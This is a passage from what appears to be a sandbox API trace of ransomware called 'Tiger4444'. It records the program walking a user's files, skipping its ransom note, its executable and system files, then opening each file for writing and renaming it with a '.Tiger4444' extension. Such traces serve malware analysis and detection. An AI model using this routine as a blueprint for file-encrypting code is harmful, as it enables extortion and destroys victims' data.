dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.073] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.073] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14152643605) returned 1 [0050.073] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=27290) returned 1 [0050.073] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0050.073] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0050.073] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6da0, lpName=0x0) returned 0x2c8 [0050.074] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6da0) returned 0xbe0000 [0050.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0050.074] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.075] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.075] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.075] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0050.075] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14152790098) returned 1 [0050.075] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0050.075] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0050.075] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.075] CloseHandle (hObject=0x2c8) returned 1 [0050.075] CloseHandle (hObject=0x260) returned 1 [0050.076] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\p_O1lv1CEgWauiU.mp3.Tiger4444") returned 61 [0050.076] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\p_O1lv1CEgWauiU.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p_o1lv1cegwauiu.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\p_O1lv1CEgWauiU.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p_o1lv1cegwauiu.mp3.tiger4444"), dwFlags=0x1) returned 1 [0050.076] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f590c0, ftCreationTime.dwHighDateTime=0x1d4cfc5, ftLastAccessTime.dwLowDateTime=0x438b0b90, ftLastAccessTime.dwHighDateTime=0x1d4d03f, ftLastWriteTime.dwLowDateTime=0x438b0b90, ftLastWriteTime.dwHighDateTime=0x1d4d03f, nFileSizeHigh=0x0, nFileSizeLow=0xb996, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q-MlqL 1rLwdq98.png", cAlternateFileName="Q-MLQL~1.PNG")) returned 1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="Tiger4444.exe") returned -1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2=".") returned 1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="..") returned 1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="windows") returned -1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="bootmgr") returned 1 [0050.076] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="pagefile.sys") returned 1 [0050.077] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="boot") returned 1 [0050.077] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="ids.txt") returned 1 [0050.077] lstrcmpiW (lpString1="q-MlqL 1rLwdq98.png", lpString2="NTUSER.DAT") returned 1 [0050.077] lstrcpyW (in: lpString1=0x30aeae8, lpString2="q-MlqL 1rLwdq98.png" | out: lpString1="q-MlqL 1rLwdq98.png") returned="q-MlqL 1rLwdq98.png" [0050.077] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\q-MlqL 1rLwdq98.png", dwFileAttributes=0x0) returned 1 [0050.077] lstrlenW (lpString="q-MlqL 1rLwdq98.png") returned 19 [0050.077] lstrlenW (lpString="Tiger4444") returned 9 [0050.077] lstrcmpiW (lpString1="wdq98.png", lpString2="Tiger4444") returned 1 [0050.077] lstrlenW (lpString=".dll") returned 4 [0050.077] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.077] lstrlenW (lpString=".lnk") returned 4 [0050.077] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.077] lstrlenW (lpString=".ini") returned 4 [0050.077] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.077] lstrlenW (lpString=".sys") returned 4 [0050.077] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\q-MlqL 1rLwdq98.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\q-mlql 1rlwdq98.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.077] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.077] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14153039465) returned 1 [0050.077] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=47510) returned 1 [0050.077] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0050.077] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0050.077] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbca0, lpName=0x0) returned 0x2c8 [0050.078] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbca0) returned 0xbe0000 [0050.079] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.079] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0050.079] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.079] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0050.079] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.080] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0050.080] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.080] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0050.080] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14153285851) returned 1 [0050.080] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0050.080] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0050.080] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.081] CloseHandle (hObject=0x2c8) returned 1 [0050.081] CloseHandle (hObject=0x260) returned 1 [0050.081] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\q-MlqL 1rLwdq98.png.Tiger4444") returned 61 [0050.081] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\q-MlqL 1rLwdq98.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\q-mlql 1rlwdq98.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\q-MlqL 1rLwdq98.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\q-mlql 1rlwdq98.png.tiger4444"), dwFlags=0x1) returned 1 [0050.082] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f78db40, ftCreationTime.dwHighDateTime=0x1d4d595, ftLastAccessTime.dwLowDateTime=0x59a2bef0, ftLastAccessTime.dwHighDateTime=0x1d4c5fe, ftLastWriteTime.dwLowDateTime=0x59a2bef0, ftLastWriteTime.dwHighDateTime=0x1d4c5fe, nFileSizeHigh=0x0, nFileSizeLow=0x8d0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qu9-HWI6tzX5Zu16Cpf.wav", cAlternateFileName="QU9-HW~1.WAV")) returned 1 [0050.082] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.082] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.082] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="Tiger4444.exe") returned -1 [0050.082] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2=".") returned 1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="..") returned 1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="windows") returned -1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="bootmgr") returned 1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="pagefile.sys") returned 1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="boot") returned 1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="ids.txt") returned 1 [0050.083] lstrcmpiW (lpString1="Qu9-HWI6tzX5Zu16Cpf.wav", lpString2="NTUSER.DAT") returned 1 [0050.083] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Qu9-HWI6tzX5Zu16Cpf.wav" | out: lpString1="Qu9-HWI6tzX5Zu16Cpf.wav") returned="Qu9-HWI6tzX5Zu16Cpf.wav" [0050.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Qu9-HWI6tzX5Zu16Cpf.wav", dwFileAttributes=0x0) returned 1 [0050.083] lstrlenW (lpString="Qu9-HWI6tzX5Zu16Cpf.wav") returned 23 [0050.083] lstrlenW (lpString="Tiger4444") returned 9 [0050.083] lstrcmpiW (lpString1="16Cpf.wav", lpString2="Tiger4444") returned -1 [0050.083] lstrlenW (lpString=".dll") returned 4 [0050.083] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.083] lstrlenW (lpString=".lnk") returned 4 [0050.083] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.083] lstrlenW (lpString=".ini") returned 4 [0050.083] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.083] lstrlenW (lpString=".sys") returned 4 [0050.083] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Qu9-HWI6tzX5Zu16Cpf.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qu9-hwi6tzx5zu16cpf.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.084] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.084] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14153685554) returned 1 [0050.084] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=36107) returned 1 [0050.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0050.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0050.084] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9010, lpName=0x0) returned 0x2c8 [0050.084] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9010) returned 0xbe0000 [0050.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0050.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0050.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.086] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14153946940) returned 1 [0050.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0050.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0050.086] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.087] CloseHandle (hObject=0x2c8) returned 1 [0050.087] CloseHandle (hObject=0x260) returned 1 [0050.088] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Qu9-HWI6tzX5Zu16Cpf.wav.Tiger4444") returned 65 [0050.088] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Qu9-HWI6tzX5Zu16Cpf.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qu9-hwi6tzx5zu16cpf.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Qu9-HWI6tzX5Zu16Cpf.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qu9-hwi6tzx5zu16cpf.wav.tiger4444"), dwFlags=0x1) returned 1 [0050.089] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc6a31a0, ftCreationTime.dwHighDateTime=0x1d4d3e0, ftLastAccessTime.dwLowDateTime=0x555592e0, ftLastAccessTime.dwHighDateTime=0x1d4ca46, ftLastWriteTime.dwLowDateTime=0x555592e0, ftLastWriteTime.dwHighDateTime=0x1d4ca46, nFileSizeHigh=0x0, nFileSizeLow=0x13c54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rx-7.wav", cAlternateFileName="")) returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="Tiger4444.exe") returned -1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2=".") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="..") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="windows") returned -1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="bootmgr") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="pagefile.sys") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="boot") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="ids.txt") returned 1 [0050.089] lstrcmpiW (lpString1="Rx-7.wav", lpString2="NTUSER.DAT") returned 1 [0050.089] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Rx-7.wav" | out: lpString1="Rx-7.wav") returned="Rx-7.wav" [0050.089] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Rx-7.wav", dwFileAttributes=0x0) returned 1 [0050.090] lstrlenW (lpString="Rx-7.wav") returned 8 [0050.090] lstrlenW (lpString="Tiger4444") returned 9 [0050.090] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0050.090] lstrlenW (lpString=".dll") returned 4 [0050.090] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.090] lstrlenW (lpString=".lnk") returned 4 [0050.090] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.090] lstrlenW (lpString=".ini") returned 4 [0050.090] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.090] lstrlenW (lpString=".sys") returned 4 [0050.090] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.090] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Rx-7.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rx-7.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.090] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.090] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14154352648) returned 1 [0050.090] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=80980) returned 1 [0050.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0050.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0050.091] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13f60, lpName=0x0) returned 0x2c8 [0050.091] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13f60) returned 0xbe0000 [0050.093] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.093] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.093] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.093] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.093] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.093] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.093] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.094] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.094] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14154670583) returned 1 [0050.094] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0050.094] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0050.094] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.095] CloseHandle (hObject=0x2c8) returned 1 [0050.095] CloseHandle (hObject=0x260) returned 1 [0050.096] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Rx-7.wav.Tiger4444") returned 50 [0050.096] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Rx-7.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rx-7.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Rx-7.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rx-7.wav.tiger4444"), dwFlags=0x1) returned 1 [0050.097] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd3bc50, ftCreationTime.dwHighDateTime=0x1d4c74e, ftLastAccessTime.dwLowDateTime=0xd267e1e0, ftLastAccessTime.dwHighDateTime=0x1d4cfe9, ftLastWriteTime.dwLowDateTime=0xd267e1e0, ftLastWriteTime.dwHighDateTime=0x1d4cfe9, nFileSizeHigh=0x0, nFileSizeLow=0x131fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SBQ20pb9Qa7gV5.png", cAlternateFileName="SBQ20P~1.PNG")) returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="Tiger4444.exe") returned -1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2=".") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="..") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="windows") returned -1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="bootmgr") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="pagefile.sys") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="boot") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="ids.txt") returned 1 [0050.097] lstrcmpiW (lpString1="SBQ20pb9Qa7gV5.png", lpString2="NTUSER.DAT") returned 1 [0050.097] lstrcpyW (in: lpString1=0x30aeae8, lpString2="SBQ20pb9Qa7gV5.png" | out: lpString1="SBQ20pb9Qa7gV5.png") returned="SBQ20pb9Qa7gV5.png" [0050.097] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SBQ20pb9Qa7gV5.png", dwFileAttributes=0x0) returned 1 [0050.097] lstrlenW (lpString="SBQ20pb9Qa7gV5.png") returned 18 [0050.097] lstrlenW (lpString="Tiger4444") returned 9 [0050.097] lstrcmpiW (lpString1="a7gV5.png", lpString2="Tiger4444") returned -1 [0050.097] lstrlenW (lpString=".dll") returned 4 [0050.097] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.097] lstrlenW (lpString=".lnk") returned 4 [0050.098] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.098] lstrlenW (lpString=".ini") returned 4 [0050.098] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.098] lstrlenW (lpString=".sys") returned 4 [0050.098] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.098] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SBQ20pb9Qa7gV5.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sbq20pb9qa7gv5.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.098] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.098] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14155139966) returned 1 [0050.098] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=78330) returned 1 [0050.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0050.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0050.098] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13500, lpName=0x0) returned 0x2c8 [0050.099] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13500) returned 0xbe0000 [0050.101] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.101] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.101] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.101] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.101] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14155426466) returned 1 [0050.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0050.101] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0050.101] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.102] CloseHandle (hObject=0x2c8) returned 1 [0050.102] CloseHandle (hObject=0x260) returned 1 [0050.103] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SBQ20pb9Qa7gV5.png.Tiger4444") returned 60 [0050.103] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SBQ20pb9Qa7gV5.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sbq20pb9qa7gv5.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SBQ20pb9Qa7gV5.png.Tiger4444" (normalized: 